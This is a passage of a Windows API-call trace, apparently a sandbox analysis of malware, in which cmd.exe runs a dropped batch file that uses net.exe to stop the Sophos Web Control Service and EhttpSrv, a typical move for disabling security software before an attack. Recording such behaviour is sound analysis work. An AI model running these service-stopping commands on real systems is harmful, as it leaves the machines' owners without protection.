returned 0x3f6cf0 [0199.378] GetProcessHeap () returned 0x3e0000 [0199.378] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0199.379] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0199.379] GetProcessHeap () returned 0x3e0000 [0199.379] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0199.379] GetProcessHeap () returned 0x3e0000 [0199.379] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0199.379] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.380] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.380] GetLastError () returned 0x2 [0199.380] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.380] GetLastError () returned 0x2 [0199.381] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.381] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0199.381] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0199.381] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.382] GetLastError () returned 0x2 [0199.382] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0199.382] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0199.382] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.383] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0199.383] SetErrorMode (uMode=0x0) returned 0x1 [0199.383] GetProcessHeap () returned 0x3e0000 [0199.383] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0199.383] GetProcessHeap () returned 0x3e0000 [0199.383] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0199.384] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0199.384] GetProcessHeap () returned 0x3e0000 [0199.384] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0199.384] GetProcessHeap () returned 0x3e0000 [0199.384] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0199.384] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.384] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.385] GetLastError () returned 0x2 [0199.385] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.385] GetLastError () returned 0x2 [0199.385] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.386] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0199.386] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0199.386] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.387] GetLastError () returned 0x2 [0199.387] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0199.387] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0199.387] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.388] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0199.388] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0199.388] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0199.388] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0199.388] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Sophos Web Control ServiceΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Sophos Web Control ServiceΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Sophos Web Control ServiceΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x4a0, dwThreadId=0x5f0)) returned 1 [0199.392] CloseHandle (hObject=0x74) returned 1 [0199.392] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0199.392] GetProcessHeap () returned 0x3e0000 [0199.392] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.392] GetEnvironmentStringsW () returned 0x3f8408* [0199.392] GetProcessHeap () returned 0x3e0000 [0199.392] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.392] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.392] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0199.584] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0199.584] CloseHandle (hObject=0x78) returned 1 [0199.585] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0199.585] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0199.585] GetProcessHeap () returned 0x3e0000 [0199.585] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.585] GetEnvironmentStringsW () returned 0x3f8408* [0199.585] GetProcessHeap () returned 0x3e0000 [0199.585] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.585] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.585] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0199.585] GetProcessHeap () returned 0x3e0000 [0199.585] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.585] GetEnvironmentStringsW () returned 0x3f8408* [0199.585] GetProcessHeap () returned 0x3e0000 [0199.585] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.585] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.585] GetProcessHeap () returned 0x3e0000 [0199.585] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0199.585] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0199.585] _get_osfhandle (_FileHandle=1) returned 0x264 [0199.585] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0199.585] _get_osfhandle (_FileHandle=1) returned 0x264 [0199.585] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0199.585] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0199.585] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0199.586] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0199.586] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0199.586] SetConsoleInputExeNameW () returned 0x1 [0199.586] GetConsoleOutputCP () returned 0x1b5 [0199.586] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0199.586] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.586] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0199.586] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0199.587] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.587] SetFilePointer (in: hFile=0x78, lDistanceToMove=2909, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb5d [0199.587] GetProcessHeap () returned 0x3e0000 [0199.587] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0199.587] GetProcessHeap () returned 0x3e0000 [0199.587] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0199.587] GetProcessHeap () returned 0x3e0000 [0199.587] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0199.587] GetProcessHeap () returned 0x3e0000 [0199.587] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0199.587] GetProcessHeap () returned 0x3e0000 [0199.587] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbaf0 | out: hHeap=0x3e0000) returned 1 [0199.587] GetProcessHeap () returned 0x3e0000 [0199.587] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0199.587] GetProcessHeap () returned 0x3e0000 [0199.587] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0199.587] GetProcessHeap () returned 0x3e0000 [0199.587] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0199.587] GetProcessHeap () returned 0x3e0000 [0199.587] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0199.587] GetProcessHeap () returned 0x3e0000 [0199.587] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0199.587] GetProcessHeap () returned 0x3e0000 [0199.587] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0199.587] GetProcessHeap () returned 0x3e0000 [0199.587] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0199.587] GetProcessHeap () returned 0x3e0000 [0199.587] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0199.587] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.587] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb5d [0199.587] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xd64, lpOverlapped=0x0) returned 1 [0199.587] SetFilePointer (in: hFile=0x78, lDistanceToMove=2931, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb73 [0199.588] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=22, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop EhttpSrv /y\r\n Control ServiceΓÇ¥ /y\r\n¥ /y\r\nlures\r\nnded\r\n") returned 22 [0199.588] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.588] GetFileType (hFile=0x78) returned 0x1 [0199.588] _get_osfhandle (_FileHandle=3) returned 0x78 [0199.588] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb73 [0199.588] GetProcessHeap () returned 0x3e0000 [0199.588] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0199.589] GetProcessHeap () returned 0x3e0000 [0199.589] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0199.592] _tell (_FileHandle=3) returned 2931 [0199.592] _close (_FileHandle=3) returned 0 [0199.592] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0199.592] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0199.592] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0199.592] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0199.592] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0199.592] _wcsicmp (_String1="net", _String2="CD") returned 11 [0199.592] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0199.592] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0199.592] _wcsicmp (_String1="net", _String2="REN") returned -4 [0199.592] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0199.592] _wcsicmp (_String1="net", _String2="SET") returned -5 [0199.592] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0199.592] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0199.592] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0199.592] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0199.592] _wcsicmp (_String1="net", _String2="MD") returned 1 [0199.592] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0199.592] _wcsicmp (_String1="net", _String2="RD") returned -4 [0199.592] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0199.592] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0199.592] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0199.593] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0199.593] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0199.593] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0199.593] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0199.593] _wcsicmp (_String1="net", _String2="VER") returned -8 [0199.593] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0199.593] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0199.593] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0199.593] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0199.593] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0199.593] _wcsicmp (_String1="net", _String2="START") returned -5 [0199.593] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0199.593] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0199.593] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0199.593] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0199.593] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0199.593] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0199.593] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0199.593] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0199.593] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0199.593] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0199.594] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0199.594] SetErrorMode (uMode=0x0) returned 0x1 [0199.594] GetProcessHeap () returned 0x3e0000 [0199.594] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0199.594] GetProcessHeap () returned 0x3e0000 [0199.594] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0199.594] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0199.594] GetProcessHeap () returned 0x3e0000 [0199.594] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0199.594] GetProcessHeap () returned 0x3e0000 [0199.594] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0199.595] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.595] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.595] GetLastError () returned 0x2 [0199.596] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.596] GetLastError () returned 0x2 [0199.596] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.596] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0199.597] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0199.597] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0199.597] GetLastError () returned 0x2 [0199.597] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0199.598] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0199.598] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.599] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0199.599] SetErrorMode (uMode=0x0) returned 0x1 [0199.599] GetProcessHeap () returned 0x3e0000 [0199.599] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0199.599] GetProcessHeap () returned 0x3e0000 [0199.599] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0199.599] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0199.599] GetProcessHeap () returned 0x3e0000 [0199.599] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0199.599] GetProcessHeap () returned 0x3e0000 [0199.599] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0199.600] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.600] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.600] GetLastError () returned 0x2 [0199.600] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.601] GetLastError () returned 0x2 [0199.601] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0199.601] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0199.601] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0199.602] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0199.602] GetLastError () returned 0x2 [0199.602] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0199.602] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0199.603] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0199.603] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0199.603] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0199.603] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0199.603] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0199.603] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop EhttpSrv /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop EhttpSrv /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop EhttpSrv /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x58c, dwThreadId=0x4b4)) returned 1 [0199.608] CloseHandle (hObject=0x78) returned 1 [0199.608] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0199.608] GetProcessHeap () returned 0x3e0000 [0199.608] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.608] GetEnvironmentStringsW () returned 0x3f8408* [0199.609] GetProcessHeap () returned 0x3e0000 [0199.609] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.609] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.609] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0199.729] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0199.729] CloseHandle (hObject=0x74) returned 1 [0199.729] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0199.729] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0199.729] GetProcessHeap () returned 0x3e0000 [0199.729] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0199.729] GetEnvironmentStringsW () returned 0x3f8408* [0199.730] GetProcessHeap () returned 0x3e0000 [0199.730] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0199.730] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0199.730] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0199.730] GetProcessHeap () returned 0x3e0000 [0199.730] HeapFree (in: hHeap=0x3e0000, 